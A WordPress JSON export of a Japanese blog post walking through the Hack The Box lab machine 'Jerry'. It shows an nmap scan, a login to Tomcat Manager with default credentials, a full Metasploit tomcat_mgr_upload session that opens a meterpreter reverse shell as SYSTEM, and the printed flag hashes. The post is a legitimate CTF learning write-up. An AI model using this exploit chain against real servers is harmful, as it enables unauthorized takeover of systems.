{"id":3743,"date":"2020-08-17T00:59:12","date_gmt":"2020-08-16T15:59:12","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3743"},"modified":"2020-08-30T23:33:01","modified_gmt":"2020-08-30T14:33:01","slug":"hack-the-box-jerry-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3743","title":{"rendered":"Hack The Box – Jerry – Walkthrough"},"content":{"rendered":"

8080\u756a\u30dd\u30fc\u30c8\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b<\/h3>\n
\r\n# nmap -A -n -F -T5 jerry.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-16 14:08 UTC\r\nNmap scan report for jerry.htb (10.10.10.95)\r\nHost is up (0.050s latency).\r\nNot shown: 99 filtered ports\r\nPORT     STATE SERVICE VERSION\r\n8080\/tcp open  http    Apache Tomcat\/Coyote JSP engine 1.1\r\n|_http-favicon: Apache Tomcat\r\n|_http-open-proxy: Proxy might be redirecting requests\r\n|_http-server-header: Apache-Coyote\/1.1\r\n|_http-title: Apache Tomcat\/7.0.88\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\n<\/pre>\n
8080\u756a\u30dd\u30fc\u30c8\u306b\u30a2\u30af\u30bb\u30b9\u3057\u3066\u307f\u308b<\/h3>\n
\"\"<\/a><\/p>\n
[Manager App]\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u8a8d\u8a3c\u753b\u9762\u304c\u8868\u793a\u3055\u308c\u308b\u305f\u3081\u3001\u4f55\u5ea6\u304b\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u9593\u9055\u3048\u308b\u3068403\u30da\u30fc\u30b8\u304c\u8868\u793a\u3055\u308c\u305f\u3002
\n\"\"<\/a><\/p>\n
\u3053\u3053\u306b\u8a18\u8f09\u3055\u308c\u305f\u4ee5\u4e0bID\u30fbPW\u3067[Manager App]\u306b\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u305f\u3002
\nID:tomcat
\nPW:s3cret<\/p>\n
tomcat\u3092\u8d77\u70b9\u306b\u3057\u3066\u653b\u6483\u3059\u308b<\/h3>\n
\u30ea\u30d0\u30fc\u30b9\u30b7\u30a7\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066flags\u3092\u53d6\u5f97\u3057\u305f\u3002<\/p>\n
\r\nmsf5 exploit(windows\/http\/cayin_xpost_sql_rce) > search tomcat\r\n\r\nMatching Modules\r\n================\r\n\r\n   #   Name                                                         Disclosure Date  Rank       Check  Description\r\n   -   ----                                                         ---------------  ----       -----  -----------\r\n   0   auxiliary\/admin\/http\/ibm_drm_download                        2020-04-21       normal     Yes    IBM Data Risk Manager Arbitrary File Download\r\n   1   auxiliary\/admin\/http\/tomcat_administration                                    normal     No     Tomcat Administration Tool Default Access\r\n   2   auxiliary\/admin\/http\/tomcat_utf8_traversal                   2009-01-09       normal     No     Tomcat UTF-8 Directory Traversal Vulnerability\r\n   3   auxiliary\/admin\/http\/trendmicro_dlp_traversal                2009-01-09       normal     No     TrendMicro Data Loss Prevention 5.5 Directory Traversal\r\n   4   auxiliary\/dos\/http\/apache_commons_fileupload_dos             2014-02-06       normal     No     Apache Commons FileUpload and Apache Tomcat DoS\r\n   5   auxiliary\/dos\/http\/apache_tomcat_transfer_encoding           2010-07-09       normal     No     Apache Tomcat Transfer-Encoding Information Disclosure and DoS\r\n   6   auxiliary\/dos\/http\/hashcollision_dos                         2011-12-28       normal     No     Hashtable Collisions\r\n   7   auxiliary\/scanner\/http\/tomcat_enum                                            normal     No     Apache Tomcat User Enumeration\r\n   8   auxiliary\/scanner\/http\/tomcat_mgr_login                                       normal     No     Tomcat Application Manager Login Utility\r\n   9   exploit\/linux\/http\/cisco_prime_inf_rce                       2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution\r\n   10  exploit\/linux\/http\/cpi_tararchive_upload                     2019-05-15       excellent  Yes    Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability\r\n   11  exploit\/multi\/http\/cisco_dcnm_upload_2019                    2019-06-26       excellent  Yes    Cisco Data Center Network Manager Unauthenticated Remote Code Execution\r\n   12  exploit\/multi\/http\/struts2_namespace_ognl                    2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection\r\n   13  exploit\/multi\/http\/struts_code_exec_classloader              2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution\r\n   14  exploit\/multi\/http\/struts_dev_mode                           2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution\r\n   15  exploit\/multi\/http\/tomcat_jsp_upload_bypass                  2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass\r\n   16  exploit\/multi\/http\/tomcat_mgr_deploy                         2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution\r\n   17  exploit\/multi\/http\/tomcat_mgr_upload                         2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution\r\n   18  exploit\/multi\/http\/zenworks_configuration_management_upload  2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload\r\n   19  exploit\/windows\/http\/cayin_xpost_sql_rce                     2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE\r\n   20  exploit\/windows\/http\/tomcat_cgi_cmdlineargs                  2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability\r\n   21  post\/multi\/gather\/tomcat_gather                                               normal     No     Gather Tomcat Credentials\r\n   22  post\/windows\/gather\/enum_tomcat                                               normal     No     Windows Gather Apache Tomcat Enumeration\r\n\r\n\r\nInteract with a module by name or index, for example use 22 or use post\/windows\/gather\/enum_tomcat\r\n\r\nmsf5 exploit(windows\/http\/cayin_xpost_sql_rce) > use exploit\/multi\/http\/tomcat_mgr_upload\r\n[*] No payload configured, defaulting to java\/meterpreter\/reverse_tcp\r\nmsf5 exploit(multi\/http\/tomcat_mgr_upload) > show options\r\n\r\nModule options (exploit\/multi\/http\/tomcat_mgr_upload):\r\n\r\n   Name          Current Setting  Required  Description\r\n   ----          ---------------  --------  -----------\r\n   HttpPassword                   no        The password for the specified username\r\n   HttpUsername                   no        The username to authenticate as\r\n   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]\r\n   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'\r\n   RPORT         80               yes       The target port (TCP)\r\n   SSL           false            no        Negotiate SSL\/TLS for outgoing connections\r\n   TARGETURI     \/manager         yes       The URI path of the manager app (\/html\/upload and \/undeploy will be used)\r\n   VHOST                          no        HTTP server virtual host\r\n\r\n\r\nPayload options (java\/meterpreter\/reverse_tcp):\r\n\r\n   Name   Current Setting  Required  Description\r\n   ----   ---------------  --------  -----------\r\n   LHOST  172.17.0.2       yes       The listen address (an interface may be specified)\r\n   LPORT  4444             yes       The listen port\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Java Universal\r\n\r\n\r\nmsf5 exploit(multi\/http\/tomcat_mgr_upload) > set HttpPassword s3cret\r\nHttpPassword => s3cret\r\nmsf5 exploit(multi\/http\/tomcat_mgr_upload) > set HttpUsername tomcat\r\nHttpUsername => tomcat\r\nmsf5 exploit(multi\/http\/tomcat_mgr_upload) > set RHOSTS jerry.htb\r\nRHOSTS => jerry.htb\r\nmsf5 exploit(multi\/http\/tomcat_mgr_upload) > set RPORT 8080\r\nRPORT => 8080\r\nmsf5 exploit(multi\/http\/tomcat_mgr_upload) > set LHOST 10.10.14.7\r\nLHOST => 10.10.14.7\r\nmsf5 exploit(multi\/http\/tomcat_mgr_upload) > exploit\r\n\r\n[-] Handler failed to bind to 10.10.14.7:4444:-  -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Retrieving session ID and CSRF token...\r\n[*] Uploading and deploying heHP934kTwG31cQvov...\r\n[*] Executing heHP934kTwG31cQvov...\r\n[*] Sending stage (53944 bytes) to 172.17.0.1\r\n[*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:53072) at 2020-08-16 15:28:45 +0000\r\n[*] Undeploying heHP934kTwG31cQvov ...\r\n\r\nmeterpreter > getuid\r\nServer username: JERRY$\r\nmeterpreter > shell\r\nProcess 1 created.\r\nChannel 1 created.\r\nMicrosoft Windows [Version 6.3.9600]\r\n(c) 2013 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\apache-tomcat-7.0.88>whoami\r\nwhoami\r\nnt authority\\system\r\n\r\nC:\\apache-tomcat-7.0.88>type "C:\\Users\\Administrator\\Desktop\\flags\\2 for the price of 1.txt"\r\ntype "C:\\Users\\Administrator\\Desktop\\flags\\2 for the price of 1.txt"\r\nuser.txt\r\n7004dbcef0f854e0fb401875f26ebd00\r\n\r\nroot.txt\r\n04a8b36e1545a455393d067e772fe90e\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
8080\u756a\u30dd\u30fc\u30c8\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b # nmap -A -n -F -T5 jerry.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-16 14:08 UTC […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3743"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3743"}],"version-history":[{"count":3,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3743\/revisions"}],"predecessor-version":[{"id":3782,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3743\/revisions\/3782"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3743"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3743"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3743"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}